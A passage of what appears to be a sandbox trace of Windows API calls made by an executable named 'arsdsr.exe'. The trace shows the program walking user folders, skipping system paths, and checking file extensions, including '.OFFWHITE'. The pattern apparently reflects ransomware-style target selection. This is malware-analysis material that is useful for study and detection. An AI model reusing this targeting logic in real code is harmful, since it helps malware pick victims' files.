Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\" [0151.734] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\" [0151.734] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" [0151.734] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0151.734] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.734] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0151.734] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.734] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.734] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="...") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="windows") returned -1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$recycle.bin") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="rsa") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ntuser.dat") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="programdata") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="appdata") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="program files") returned 1 [0151.734] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="program files (x86)") returned 1 [0151.734] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\" [0151.734] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0151.735] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" [0151.735] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" [0151.735] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0151.735] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0151.735] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.735] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0151.735] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.735] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.735] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532ebf00, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x532ebf00, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x532ebf00, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0151.735] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0151.735] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" [0151.735] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0151.735] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.735] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.735] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0151.735] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0151.735] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0151.735] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0151.736] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9b3800, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x4f9b3800, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x4f9b3800, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="..") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="...") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="windows") returned -1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$recycle.bin") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="rsa") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ntuser.dat") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="programdata") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="appdata") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="program files") returned 1 [0151.736] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="program files (x86)") returned 1 [0151.736] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\" [0151.736] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="C:/Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0151.736] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.736] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.736] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0151.736] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0151.736] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9b3800, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x4f9b3800, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x4f9b3800, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0151.736] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0151.737] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0151.737] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0151.737] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0151.737] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.737] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0151.737] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0151.737] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="...") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="$recycle.bin") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="rsa") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="ntuser.dat") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="programdata") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="appdata") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="program files") returned 1 [0151.737] lstrcmpiW (lpString1="Start Menu", lpString2="program files (x86)") returned 1 [0151.737] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0151.737] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Start Menu" | out: lpString1="C:/Users\\All Users\\Start Menu") returned="C:/Users\\All Users\\Start Menu" [0151.737] lstrcatW (in: lpString1="C:/Users\\All Users\\Start Menu", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Start Menu\\") returned="C:/Users\\All Users\\Start Menu\\" [0151.737] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Start Menu\\" | out: lpString1="C:/Users\\All Users\\Start Menu\\") returned="C:/Users\\All Users\\Start Menu\\" [0151.737] lstrcatW (in: lpString1="C:/Users\\All Users\\Start Menu\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Start Menu\\*.*") returned="C:/Users\\All Users\\Start Menu\\*.*" [0151.737] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Start Menu\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0xffffffff [0151.737] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Sun", cAlternateFileName="")) returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2=".") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="..") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="...") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="windows") returned -1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="$recycle.bin") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="rsa") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="ntuser.dat") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="programdata") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="appdata") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="program files") returned 1 [0151.738] lstrcmpiW (lpString1="Sun", lpString2="program files (x86)") returned 1 [0151.738] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0151.738] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Sun" | out: lpString1="C:/Users\\All Users\\Sun") returned="C:/Users\\All Users\\Sun" [0151.738] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Sun\\") returned="C:/Users\\All Users\\Sun\\" [0151.738] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Sun\\" | out: lpString1="C:/Users\\All Users\\Sun\\") returned="C:/Users\\All Users\\Sun\\" [0151.738] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Sun\\*.*") returned="C:/Users\\All Users\\Sun\\*.*" [0151.738] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Sun\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0151.739] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.739] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0151.739] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.739] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.739] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Java", cAlternateFileName="")) returned 1 [0151.739] lstrcmpiW (lpString1="Java", lpString2=".") returned 1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="..") returned 1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="...") returned 1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="windows") returned -1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="$recycle.bin") returned 1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="rsa") returned -1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="ntuser.dat") returned -1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="programdata") returned -1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="appdata") returned 1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="program files") returned -1 [0151.739] lstrcmpiW (lpString1="Java", lpString2="program files (x86)") returned -1 [0151.739] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Sun\\" | out: lpString1="C:/Users\\All Users\\Sun\\") returned="C:/Users\\All Users\\Sun\\" [0151.739] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\", lpString2="Java" | out: lpString1="C:/Users\\All Users\\Sun\\Java") returned="C:/Users\\All Users\\Sun\\Java" [0151.739] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\") returned="C:/Users\\All Users\\Sun\\Java\\" [0151.739] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Sun\\Java\\" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\") returned="C:/Users\\All Users\\Sun\\Java\\" [0151.739] lstrcatW (in: lpString1="C:/Users\\All Users\\Sun\\Java\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Sun\\Java\\*.*") returned="C:/Users\\All Users\\Sun\\Java\\*.*" [0151.739] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Sun\\Java\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360034, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.740] 